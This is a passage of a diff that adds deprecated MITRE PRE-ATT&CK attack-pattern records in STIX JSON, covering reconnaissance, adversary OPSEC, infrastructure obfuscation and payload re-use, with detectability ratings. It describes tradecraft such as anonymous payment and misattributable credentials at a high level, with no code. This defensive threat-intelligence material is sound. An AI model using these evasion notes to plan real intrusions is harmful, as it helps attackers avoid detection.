"1.0", + "x_mitre_difficulty_for_adversary_explanation": "Various available tools and data sources for scouting and detecting network topologies.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Network mapping techniques/tools typically generate benign traffic that does not require further investigation by a defender since there is no actionable defense to execute. Defender review of access logs may provide some insight based on trends or patterns.", + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--695b1cce-57d7-49ae-a2af-820d50153f12", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mine social media", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1273).\n\nAn adversary may research available open source information about a target commonly found on social media sites such as [Facebook](https://www.facebook.com), [Instagram](https://www.instagram.com), or [Pinterest](https://www.pinterest.com). Social media is public by design and provides insight into the interests and potentially inherent weaknesses of a target for exploitation by the adversary. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1273", + "external_id": "T1273" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Very public by design. Application of privacy settings is not a panacea.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1050", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a54a7708-8f64-45f3-ad51-1abf976986a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mine technical blogs/forums", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1257).\n\nTechnical blogs and forums provide a way for technical staff to ask for assistance or troubleshoot problems. In doing so they may reveal information such as operating system (OS), network devices, or applications in use. (Citation: FunAndSun2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1257", + "external_id": "T1257" + }, + { + "source_name": "FunAndSun2012", + "description": "Jeff Bardin. (2012, October 10). OSINT and Cyber Intelligence - Fun and Sun in Miami. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Cannot detect access to public sites.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Success is dependent upon the existence of detailed technical specifications for target network posted in blogs/forums. Poor OPSEC practices result in an adversary gleaning a lot of sensitive information about configurations and/or issues encountered.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1034", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--31fa5b03-1ede-4fab-8a68-ed831fcf4899", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Misattributable credentials", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1322).\n\nThe use of credentials by an adversary with the intent to hide their true identity and/or portray them self as another person or entity. An adversary may use misattributable credentials in an attack to convince a victim that credentials are legitimate and trustworthy when this is not actually the case. (Citation: FakeSSLCerts)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1322", + "external_id": "T1322" + }, + { + "source_name": "FakeSSLCerts", + "description": "Paul Mutton. (2014, February 12). Fake SSL certificates deployed across the internet. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "If a previous incident identified the credentials used by an adversary, defenders can potentially use these credentials to track the adversary through reuse of the same credentials.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can easily create and use misattributable credentials to obtain servers, build environment, [https://aws.amazon.com AWS] accounts, etc. Many service providers require some form of identifiable information such as a phone number or email address, but there are several avenues to acquire these consistent with the misattributable identity.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1099", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--90884cdb-31dd-431c-87db-9cc7e03191e5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network-based hiding techniques", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1315).\n\nTechnical network hiding techniques are methods of modifying traffic to evade network signature detection or to utilize misattribution techniques. Examples include channel/IP/VLAN hopping, mimicking legitimate operations, or seeding with misinformation. (Citation: HAMMERTOSS2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1315", + "external_id": "T1315" + }, + { + "source_name": "HAMMERTOSS2015", + "description": "FireEye. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless defender is dissecting protocols or performing network signature analysis on any protocol deviations/patterns, this technique is largely undetected.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Some of the hiding techniques require special accesses (network, proximity, physical, etc.) and/or may rely on knowledge of how the defender operates and/or awareness on what visibility the defender has and how it is obtained", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1092", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b79e8a3f-a109-47c2-a0e3-564955590a3d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Non-traditional or less attributable payment options", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1316).\n\nUsing alternative payment options allows an adversary to hide their activities. Options include crypto currencies, barter systems, pre-paid cards or shell accounts. (Citation: Goodin300InBitcoins)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1316", + "external_id": "T1316" + }, + { + "source_name": "Goodin300InBitcoins", + "description": "Dan Goodin. (2013, October 17). You\u2019re infected\u2014if you want to see your data again, pay us $300 in Bitcoins. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender likely will not have access to payment information. Monitoring crypto-currency or barter boards is resource intensive and not fully automatable.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Easy to use pre-paid cards or shell accounts to pay for services online. Crypto currencies and barter systems can avoid use of trace-able bank or credit apparatus.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1093", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--5436571f-2332-4b51-b7ed-0bc822fe02c2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "OS-vendor provided communication channels", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1390).\n\nGoogle and Apple provide Google Cloud Messaging and Apple Push Notification Service, respectively, services designed to enable efficient communication between third-party mobile app backend servers and the mobile apps running on individual devices. These services maintain an encrypted connection between every mobile device and Google or Apple that cannot easily be inspected and must be allowed to traverse networks as part of normal device operation. These services could be used by adversaries for communication to compromised mobile devices. (Citation: Securelist Mobile Malware 2013) (Citation: DroydSeuss)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1390", + "external_id": "T1390" + }, + { + "source_name": "Securelist Mobile Malware 2013", + "description": "Roman Unuchek, Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved April 12, 2017." + }, + { + "source_name": "DroydSeuss", + "description": "Alberto Coletta, Victor van der Veen, and Federico Maggi. (2016). DroydSeuss: A Mobile Banking Trojan Tracker - Short Paper. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "These services are heavily utilized by mainstream mobile app developers. High volume of communications makes it extremely hard for a defender to distinguish between legitimate and adversary communications.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "These are free services provided by Google and Apple to app developers, and information on how to use them is readily available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1167", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1309).\n\nObfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: LUCKYCAT2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1309", + "external_id": "T1309" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Difficult, but defender is well aware of technique and attempts to find discrepancies.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has a variety of solutions, ranging in difficulty, that can be employed (e.g., BGP hijacking, tunneling, reflection, multi-hop, etc.)\nAdversary can also use misattributable credentials to obtain servers, build environment, [https://aws.amazon.com Amazon Web Services] (AWS) accounts, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1086", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1331).\n\nObfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: FireEyeAPT17)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1331", + "external_id": "T1331" + }, + { + "source_name": "FireEyeAPT17", + "description": "FireEye. (2015, May). APT17: Hiding in Plain Sight - FireEye and Microsoft Expose Obfuscation Tactic. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will generally not have visibility into their infrastructure.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Building and testing infrastructure and obfuscating it to protect it against intrusions are a standard part of the adversary process in preparing to conduct an operation against a target.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1108", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--9d234df0-2344-4db4-bc0f-8de9c6c071a7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate operational infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1318).\n\nObfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: DellComfooMasters)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1318", + "external_id": "T1318" + }, + { + "source_name": "DellComfooMasters", + "description": "Joe Stewart and Don Jackson, Dell SecureWorks Counter Threat Unit(TM) Threat Intelligence. (2013, July 31). Secrets of the Comfoo Masters. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "While possible to detect given a significant sample size, depending on how the unique identifier is used detection may be difficult as similar patterns may be employed elsewhere (e.g., content hosting providers, account reset URLs).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can easily generate pseudo-random identifiers to associate with a specific target, include the indicator as part of a URL and then identify which target was successful.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1095", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--357e137c-7589-4af1-895c-3fbad35ea4d2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate or encrypt code", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1319).\n\nObfuscation is the act of creating code that is more difficult to understand. Encoding transforms the code using a publicly available format. Encryption transforms the code such that it requires a key to reverse the encryption. (Citation: CylanceOpCleaver)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1319", + "external_id": "T1319" + }, + { + "source_name": "CylanceOpCleaver", + "description": "CYLANCE. (n.d.). Operation Cleaver. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Detecting encryption is easy, decrypting/deobfuscating is hard.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Various solutions exist for the adversary to use. This technique is commonly used to prevent attribution and evade detection.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1096", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--c2ffd229-11bb-4fd8-9208-edbe97b14c93", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscation or cryptography", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1313).\n\nObfuscation is the act of creating communications that are more difficult to understand. Encryption transforms the communications such that it requires a key to reverse the encryption. (Citation: FireEyeAPT28)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1313", + "external_id": "T1313" + }, + { + "source_name": "FireEyeAPT28", + "description": "FireEye, Inc. (2014). APT 28: A Window into Russia\u2019s Cyber Espionage Operations?. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Techniques and signatures are hard to detect. Advanced communications and exfiltration channels are nearly indistinguishable from background noise.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Known approaches include the use of cryptography for communications, rotating drops sites (such as random list of chat fora), and one-time [https://aws.amazon.com/s3/ Simple Storage Service (S3)] buckets, etc. All require sophisticated knowledge, infrastructure, and funding.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1090", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d58f3996-e293-4f69-a2c8-0e1851cb8297", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain Apple iOS enterprise distribution key pair and certificate", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1392).\n\nThe adversary can obtain an Apple iOS enterprise distribution key pair and certificate and use it to distribute malicious apps directly to Apple iOS devices without the need to publish the apps to the Apple App Store (where the apps could potentially be detected). (Citation: Apple Developer Enterprise Porgram Apps) (Citation: Fruit vs Zombies) (Citation: WIRELURKER) (Citation: Sideloading Change)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1392", + "external_id": "T1392" + }, + { + "source_name": "Apple Developer Enterprise Porgram Apps", + "description": "Apple Inc.. (2016). Distributing Apple Developer Enterprise Program Apps. Retrieved April 12, 2017." + }, + { + "source_name": "Fruit vs Zombies", + "description": "Claud Xiao. (2016). Fruit vs Zombies: Defeat Non-jailbroken iOS Malware. Retrieved April 12, 2017." + }, + { + "source_name": "WIRELURKER", + "description": "Claud Xiao. (2014). WIRELURKER: A New Era in iOS and OS X Malware. Retrieved April 12, 2017." + }, + { + "source_name": "Sideloading Change", + "description": "David Richardson. (2015, September 10). Change to sideloading apps in iOS 9 is a security win. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_detectable_by_common_defenses_explanation": "Starting in iOS 9, Apple has changed the user interface when installing apps to better indicate to users the potential implications of installing apps signed by an enterprise distribution key rather than from Apple's App Store and to make it more difficult for users to inadvertently install these apps. Additionally, enterprise management controls are available that can be imposed to prevent installing these apps. Also, enterprise mobility management / mobile device management (EMM/MDM) systems can be used to scan for the presence of undesired apps on enterprise mobile devices.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Apple requires a DUNS number, corporate documentation, and $299 to obtain an enterprise distribution certificate. Additionally, Apple revokes certificates if they discover malicious use. However, the enrollment information could be falsified to Apple by an adversary, or an adversary could steal an existing enterprise distribution certificate (and the corresponding private key) from a business that already possesses one.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1169", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--3d1488a6-59e6-455a-8b80-78b53edc33fe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain booter/stressor subscription", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1396).\n\nConfigure and setup booter/stressor services, often intended for server stress testing, to enable denial of service attacks. (Citation: Krebs-Anna) (Citation: Krebs-Booter) (Citation: Krebs-Bazaar)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1396", + "external_id": "T1396" + }, + { + "source_name": "Krebs-Anna", + "description": "Brian Krebs. (2017, January 18). Who is Anna-Senpai, the Mirai Worm Author?. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/" + }, + { + "source_name": "Krebs-Booter", + "description": "Brian Krebs. (2016, October 27). Are the Days of \u201cBooter\u201d Services Numbered?. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/" + }, + { + "source_name": "Krebs-Bazaar", + "description": "Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service Bazaar. Retrieved May 15, 2017.", + "url": "https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1173", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Easily accessible and used to launch DDoS attacks by even novice Internet users, and can be purchased from providers for a nominal fee, some of which even accept credit cards and PayPal payments to do.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Purchase of booster services is not observable; potentially can trace booster service used to origin of sale, yet not before attack is executed. Furthermore, subscription does not automatically mean foul intention.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--46017368-6e09-412b-a29c-385be201cc03", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain domain/IP registration information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1251).\n\nFor a computing resource to be accessible to the public, domain names and IP addresses must be registered with an authorized organization. (Citation: Google Domains WHOIS) (Citation: FunAndSun2012) (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1251", + "external_id": "T1251" + }, + { + "source_name": "Google Domains WHOIS", + "description": "Google Domains. (n.d.). About WHOIS. Retrieved April 2, 2017." + }, + { + "source_name": "FunAndSun2012", + "description": "Jeff Bardin. (2012, October 10). OSINT and Cyber Intelligence - Fun and Sun in Miami. Retrieved March 1, 2017." + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Open access to DNS registration/routing information is inherent in Internet architecture.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Proliferation of DNS information makes registration information functionally freely available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1028", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--68b45999-bb0c-4829-bbd0-75d6dac57c94", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain templates/branding materials", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1281).\n\nTemplates and branding materials may be used by an adversary to add authenticity to social engineering message. (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1281", + "external_id": "T1281" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary may download templates or branding from publicly available presentations that the defender can't monitor.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Some branding information is publicly available when a corporation publishes their briefings to the internet which provides insight into branding information and template materials. An exhaustive list of templating and branding is likely not available on the internet.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1058", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain/re-use payloads", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1346).\n\nA payload is the part of the malware which performs a malicious action. The adversary may re-use payloads when the needed capability is already available. (Citation: SonyDestover)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1346", + "external_id": "T1346" + }, + { + "source_name": "SonyDestover", + "description": "Kurt Baumgartner. (2014, December 4). Sony/Destover: mystery North Korean actor\u2019s destructive and past network activity. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but detecting an adversary acquiring a payload would require the defender to be monitoring the code repository where the payload is stored. If the adversary re-uses payloads, this allows the defender to create signatures to detect using these known indicators of compromise (e.g., hashes).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Several exploit repositories and tool suites exist for re-use and tailoring.", + "x_mitre_version": "1.0", + 